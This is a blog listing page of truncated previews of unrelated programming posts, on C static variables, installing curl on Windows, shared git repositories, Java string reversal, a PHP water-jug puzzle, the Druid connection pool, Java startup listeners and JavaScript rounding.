    在C语言中,关键字static有三个明显的作用: 1)在函数体,局部的static变量。生存期为程序的整个生命周期,(它存活多长时间);作用域却在函数体内(它在什么地方能被访问(空间))。 一个被声明为静态的变量在这一函数被调用过程中维持其值不变。因为它分配在静态存储区,函数调用结束后并不释放单元,但是在其它的作用域的无法访问。当再次调用这个函数时,这个局部的静态变量还存活,而且用在它的访
  • win7/8使用curl geeksun win7
    1.  WIN7/8下要使用curl,需要下载curl-7.20.0-win64-ssl-sspi.zip和Win64OpenSSL_Light-1_0_2d.exe。 下载地址:  http://curl.haxx.se/download.html 请选择不带SSL的版本,否则还需要安装SSL的支持包   2.  可以给Windows增加c
  • Creating a Shared Repository; Users Sharing The Repository hongtoushizi git
    转载自:   http://www.gitguys.com/topics/creating-a-shared-repository-users-sharing-the-repository/ Commands discussed in this section: git init –bare git clone git remote git pull git p
  • Java实现字符串反转的8种或9种方法 Josh_Persistence 异或反转递归反转二分交换反转java字符串反转栈反转
    注:对于第7种使用异或的方式来实现字符串的反转,如果不太看得明白的,可以参照另一篇博客: http://josh-persistence.iteye.com/blog/2205768   /** * */ package com.wsheng.aggregator.algorithm.string; import java.util.Stack; /**
  • 代码实现任意容量倒水问题 home198979 PHP算法倒水
    形象化设计模式实战             HELLO!架构                     redis命令源码解析   倒水问题:有两个杯子,一个A升,一个B升,水有无限多,现要求利用这两杯子装C
  • Druid datasource zhb8015 druid
    推荐大家使用数据库连接池 DruidDataSource. http://code.alibabatech.com/wiki/display/Druid/DruidDataSource DruidDataSource经过阿里巴巴数百个应用一年多生产环境运行验证,稳定可靠。 它最重要的特点是:监控、扩展和性能。 下载和Maven配置看这里: http
  • 两种启动监听器ApplicationListener和ServletContextListener spjich javaspring框架
    引言:有时候需要在项目初始化的时候进行一系列工作,比如初始化一个线程池,初始化配置文件,初始化缓存等等,这时候就需要用到启动监听器,下面分别介绍一下两种常用的项目启动监听器   ServletContextListener  特点: 依赖于sevlet容器,需要配置web.xml 使用方法: public class StartListener implements
  • JavaScript Rounding Methods of the Math object 何不笑 JavaScriptMath
        The next group of methods has to do with rounding decimal values into integers. Three methods — Math.ceil(),  Math.floor(), and  Math.round() — handle rounding in differen